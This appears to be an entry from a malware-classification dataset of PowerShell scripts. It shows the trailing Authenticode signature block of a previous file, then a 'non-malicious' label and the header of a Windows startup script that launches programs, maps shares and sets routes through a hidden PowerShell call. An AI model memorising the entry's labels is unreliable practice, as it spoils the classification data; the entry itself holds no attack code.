// SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
// SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
// SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
// SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY
// SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw
// SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+
// SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm
// SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq
// SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5
// SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y
// SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB
// SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB
// SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd
// SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy
// SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx
// SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw
// SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w
// SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
// SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx
// SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB
// SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w
// SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx
// SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3
// SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo
// SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v
// SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5
// SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D
// SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN
// SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI
// SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY
// SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ
// SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/
// SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2
// SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok
// SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7
// SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7
// SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW
// SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y
// SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow
// SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL
// SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
// SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK
// SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT
// SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv
// SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw
// SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT
// SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
// SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG
// SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg
// SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC
// SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq
// SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ
// SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X
// SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL
// SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5
// SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt
// SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3
// SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP
// SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl
// SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE
// SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9
// SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C
// SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp
// SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A
// SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE
// SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB
// SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k
// SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe
// SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB
// SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h
// SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov
// SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj
// SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy
// SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0
// SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv
// SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB
// SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI
// SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv
// SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr
// SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp
// SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq
// SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW
// SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H
// SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS
// SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m
// SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj
// SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO
// SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat
// SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n
// SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA
// SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj
// SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv
// SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3
// SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs
// SIG // 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991
// SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib
// SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x
// SIG // ghmeMIIZmgIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG
// SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
// SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
// SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n
// SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G
// SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor
// SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE
// SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCApcf+2ZTq/pLFd
// SIG // JpKw1Gh6yL9YMwgbA9/ezr4sGtJUujBCBgorBgEEAYI3
// SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY
// SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3
// SIG // DQEBAQUABIIBAEAgs5RB2cqgAUrBFQgcqeuu4HUTW6G5
// SIG // AmlURcq6bn2PmPKVlxwosE/Xa6ihOONmHBjwHmQeJXYo
// SIG // Un2/LVj3zfcX/ooR/Vt9j4zYZdjyq9XK7PGMHH5EEhrd
// SIG // +JBJTHU8y1y4KZGTABcnVGp7LkqRitqAP5OnGOV9X552
// SIG // Ob6x+8fBbOksrx8EeTLmx4tKBjttz+p8RkC5kPKQpHLy
// SIG // KjWhYEGuhujpKeDhVzDR+gVdhBRzxD71md9OmCzruKv9
// SIG // QWB8JHb0obd1ruyb6BtKy+jpDplJ+haBg1MDufwTcF3c
// SIG // Nzw3LkulWqlp1+5WlWu/tgHEFrAPYIStZb2xWWV8hIL9
// SIG // S1ahghcoMIIXJAYKKwYBBAGCNwMDATGCFxQwghcQBgkq
// SIG // hkiG9w0BBwKgghcBMIIW/QIBAzEPMA0GCWCGSAFlAwQC
// SIG // AQUAMIIBWAYLKoZIhvcNAQkQAQSgggFHBIIBQzCCAT8C
// SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg
// SIG // 5QQoPyBtrd5qLRewxJ6FWYx5Gd03i2bjz+vItOSf7CgC
// SIG // BmWug8++/RgSMjAyNDAxMjUxOTQ2NDAuMTZaMASAAgH0
// SIG // oIHYpIHVMIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMK
// SIG // V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
// SIG // A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYD
// SIG // VQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25z
// SIG // IExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
// SIG // OjJBRDQtNEI5Mi1GQTAxMSUwIwYDVQQDExxNaWNyb3Nv
// SIG // ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUP
// SIG // oAMCAQICEzMAAAHenkielp8oRD0AAQAAAd4wDQYJKoZI
// SIG // hvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
// SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
// SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG
// SIG // A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
// SIG // MTAwHhcNMjMxMDEyMTkwNzEyWhcNMjUwMTEwMTkwNzEy
// SIG // WjCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
// SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
// SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk
// SIG // TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1p
// SIG // dGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoyQUQ0
// SIG // LTRCOTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRp
// SIG // bWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEB
// SIG // BQADggIPADCCAgoCggIBALSB9ByF9UIDhA6xFrOniw/x
// SIG // sDl8sSi9rOCOXSSO4VMQjnNGAo5VHx0iijMEMH9LY2SU
// SIG // IBkVQS0Ml6kR+TagkUPbaEpwjhQ1mprhRgJT/jlSnic4
// SIG // 2VDAo0en4JI6xnXoAoWoKySY8/ROIKdpphgI7OJb4XHk
// SIG // 1P3sX2pNZ32LDY1ktchK1/hWyPlblaXAHRu0E3ynvwrS
// SIG // 8/bcorANO6DjuysyS9zUmr+w3H3AEvSgs2ReuLj2pkBc
// SIG // fW1UPCFudLd7IPZ2RC4odQcEPnY12jypYPnS6yZAs0pL
// SIG // pq0KRFUyB1x6x6OU73sudiHON16mE0l6LLT9OmGo0S94
// SIG // Bxg3N/3aE6fUbnVoemVc7FkFLum8KkZcbQ7cOHSAWGJx
// SIG // dCvo5OtUtRdSqf85FklCXIIkg4sm7nM9TktUVfO0kp6k
// SIG // x7mysgD0Qrxx6/5oaqnwOTWLNzK+BCi1G7nUD1pteuXv
// SIG // Qp8fE1KpTjnG/1OJeehwKNNPjGt98V0BmogZTe3SxBkO
// SIG // eOQyLA++5Hyg/L68pe+DrZoZPXJaGU/iBiFmL+ul/Oi3
// SIG // d83zLAHlHQmH/VGNBfRwP+ixvqhyk/EebwuXVJY+rTyf
// SIG // bRfuh9n0AaMhhNxxg6tGKyZS4EAEiDxrF9mAZEy8e8rf
// SIG // 6dlKIX5d3aQLo9fDda1ZTOw+XAcAvj2/N3DLVGZlHnHl
// SIG // AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUazAmbxseaapg
// SIG // dxzK8Os+naPQEsgwHwYDVR0jBBgwFoAUn6cVXQBeYl2D
// SIG // 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0
// SIG // cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwv
// SIG // TWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIw
// SIG // MTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEF
// SIG // BQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3Br
// SIG // aW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1w
// SIG // JTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIw
// SIG // ADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNVHQ8B
// SIG // Af8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAOKUwHsX
// SIG // DacGOvUIgs5HDgPs0LZ1qyHS6C6wfKlLaD36tZfbWt1x
// SIG // +GMiazSuy+GsxiVHzkhMW+FqK8gruLQWN/sOCX+fGUgT
// SIG // 9LT21cRIpcZj4/ZFIvwtkBcsCz1XEUsXYOSJUPitY7E8
// SIG // bbldmmhYZ29p+XQpIcsG/q+YjkqBW9mw0ru1MfxMTQs9
// SIG // MTDiD28gAVGrPA3NykiSChvdqS7VX+/LcEz9Ubzto/w2
// SIG // 8WA8HOCHqBTbDRHmiP7MIj+SQmI9VIayYsIGRjvelmNa
// SIG // 0OvbU9CJSz/NfMEgf2NHMZUYW8KqWEjIjPfHIKxWlNMY
// SIG // huWfWRSHZCKyIANA0aJL4soHQtzzZ2MnNfjYY851wHYj
// SIG // GgwUj/hlLRgQO5S30Zx78GqBKfylp25aOWJ/qPhC+DXM
// SIG // 2gXajIXbl+jpGcVANwtFFujCJRdZbeH1R+Q41FjgBg4m
// SIG // 3OTFDGot5DSuVkQgjku7pOVPtldE46QlDg/2WhPpTQxX
// SIG // H64sP1GfkAwUtt6rrZM/PCwRG6girYmnTRLLsicBhoYL
// SIG // h+EEFjVviXAGTk6pnu8jx/4WPWu0jsz7yFzg82/FMqCk
// SIG // 9wK3LvyLAyDHN+FxbHAxtgwad7oLQPM0WGERdB1umPCI
// SIG // iYsSf/j79EqHdoNwQYROVm+ZX10RX3n6bRmAnskeNhi0
// SIG // wnVaeVogLMdGD+nqMIIHcTCCBVmgAwIBAgITMwAAABXF
// SIG // 52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDEL
// SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
// SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
// SIG // c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9z
// SIG // b2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw
// SIG // MTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
// SIG // WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu
// SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV
// SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
// SIG // aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIw
// SIG // DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzn
// SIG // tHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9s
// SIG // SuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWN
// SIG // E893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFc
// SIG // UTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2vjUm
// SIG // ZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W
// SIG // 7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0
// SIG // hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvrg0Xn
// SIG // Rm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De
// SIG // +JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXf
// SIG // tnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SU
// SIG // HDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
// SIG // ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten
// SIG // IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh
// SIG // 8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMUR
// SIG // HXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54W
// SIG // cmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEE
// SIG // AYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+
// SIG // ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBe
// SIG // Yl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEE
// SIG // AYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDovL3d3
// SIG // dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9z
// SIG // aXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkG
// SIG // CSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQE
// SIG // AwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaA
// SIG // FNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0w
// SIG // S6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9w
// SIG // a2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
// SIG // LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB
// SIG // BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w
// SIG // a2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMu
// SIG // Y3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9n
// SIG // ATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2
// SIG // P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2
// SIG // HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1
// SIG // AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3
// SIG // lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8F7BU
// SIG // hUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tu
// SIG // PywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZ
// SIG // lvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdU
// SIG // bZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz
// SIG // 138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFH
// SIG // qfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xB
// SIG // Zj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
// SIG // Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24
// SIG // 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784
// SIG // cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1V
// SIG // M1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jEL
// SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
// SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
// SIG // c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z
// SIG // b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYw
// SIG // JAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoyQUQ0LTRCOTIt
// SIG // RkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3Rh
// SIG // bXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAaKBSisy4
// SIG // y86pl8Xy22CJZExE2vOggYMwgYCkfjB8MQswCQYDVQQG
// SIG // EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
// SIG // BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
// SIG // cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGlt
// SIG // ZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
// SIG // AOlc9fkwIhgPMjAyNDAxMjUyMzAwMDlaGA8yMDI0MDEy
// SIG // NjIzMDAwOVowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA
// SIG // 6Vz1+QIBADAHAgEAAgIC0DAHAgEAAgIRLjAKAgUA6V5H
// SIG // eQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZ
// SIG // CgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqG
// SIG // SIb3DQEBBQUAA4GBAGpTyuI/YmZL0fmiogEwgrsrjImh
// SIG // WYhcQFbUPqjwIN4OmeXeu5+rCkqS3bvzEtmU3X4bvSUO
// SIG // +wRAqWYUsB0OEgp1QhvpsznU7HjjUUO2mHHMUy/gRFb5
// SIG // U6l10yeKm1zulQ1VtibXyZVnE+HEpqqfapRRsw9eomTT
// SIG // eT85tOHomJ6CMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE
// SIG // BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV
// SIG // BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
// SIG // b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
// SIG // bWUtU3RhbXAgUENBIDIwMTACEzMAAAHenkielp8oRD0A
// SIG // AQAAAd4wDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3
// SIG // DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
// SIG // IgQgaEplA/q0lVuXJPPxVtGBVNORYKO8JLSSSA3Q8tNN
// SIG // 8iMwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCCO
// SIG // PiOfDcFeEBBJAn/mC3MgrT5w/U2z81LYD44Hc34dezCB
// SIG // mDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpX
// SIG // YXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYD
// SIG // VQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV
// SIG // BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
// SIG // AhMzAAAB3p5InpafKEQ9AAEAAAHeMCIEIFLxbJLQmUv7
// SIG // JKwSnJZEJ4dGBWPKEAicvEBXJAzw2hTNMA0GCSqGSIb3
// SIG // DQEBCwUABIICAJlwoygjS/Ei6GSOdCzWRS5sEBZ66mCt
// SIG // El2x9gsTAMzv3oeoxeozxB1QB+ZibcivfgT+NjPMUGvq
// SIG // 6MdNp95vwUIvA5flfOh9PRTRTHe4DVwDUkNoiBvsE5V7
// SIG // MM6eVL/dehQRk+O6qHPBg2LOBWfySwMABHHzASP35MD5
// SIG // 90skgWFuzdR/JcvspX4L0VBBH27MwdQjGeGp6kJ+krp6
// SIG // rgxAV9FvZGh2AUiTIc7zdXEheIiNBwaCG9GMixqNW13X
// SIG // h7AgiAPKWrFcoRIRwWcQ+YjT+oSHm39PSZpoKt/DLO68
// SIG // svdszQexKiY0iZw4ySZOExLzkjWU6SiKWGJNtArQjueH
// SIG // KDNzd+Q5ftfl2xE7Ra8yAnyX1LdmY4pyqicyyoxTAbMN
// SIG // VwCsmasRUB/UXZSUaJzyFkjLjHBw0nG8JJOKEBkNQ6Tf
// SIG // dtJmHM8OoAgaiMpvdrfXvEXw6ycHsRNStH+kgKcDl/Of
// SIG // hm7Pjr0FvBNnPzEwv/nkFKolNCmZuX1+ihiOeuyoxcLZ
// SIG // 8T49teKhF7FYO4iRwUX8CeRzrkHrmlDB/9okdHqB0tEx
// SIG // QcrYzFWbIBMLZNLS08bnU97cFK3ovZkx2MpxWZICuq5i
// SIG // MO+TPTXvZW4nMGjoMfcTjRrlTyZe9tbxCNNuxqCG+Grt
// SIG // pTLq++KMAbp5BBI6f/Udr2At6XUlmGY9OLq2
// SIG // End signature block
|
combined_dataset/train/non-malicious/Windows Startup Script_1.ps1
|
Windows Startup Script_1.ps1
|
<#======================================================================================
File Name : Startup.ps1
Original Author : Kenneth C. Mazie
:
Description : This is a Windows startup script with pop-up notification and checks to
: assure things are not exectuted if already running or set. It can be run
: as a personal startup script or as a domain startup (with some editing).
: It is intended to be executed from the Start Menu "All Programs\\Startup" folder.
:
: The script will Start programs, map shares, set routes, and can email the results
: if desired. The email subroutine is commented out. You'll need to edit it yourself.
: When run with the "debug" variable set to TRUE it also displays staus in the
: PowerShell command window. Other wise all operation statuses are displayed in pop-up
: ballons near the system tray.
:
: To call the script use the following in a shortcut or in the RUN registry key.
: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden –Noninteractive -NoLogo -Command "&{C:\\Startup.ps1}"
: Change the script name and path as needed to suit your environment.
:
: Be sure to edit all sections to suit your needs before executing. Be sure to
: enable sections you wish to run by uncommenting them at the bottom of the script.
:
: Route setting is done as a function of selecting a specific Network Adapter with the intent
: of manually altering your routes for hardline or WiFi connectivity. This section you will
: need to customize to suit your needs or leave commented out. This allowed me to
: alter the routing for my office (Wifi) or lab (hardline) by detecting whether my
: laptop was docked or not. The hardline is ALWAYS favored as written.
:
: To identify process names to use run "get-process" by itself to list process
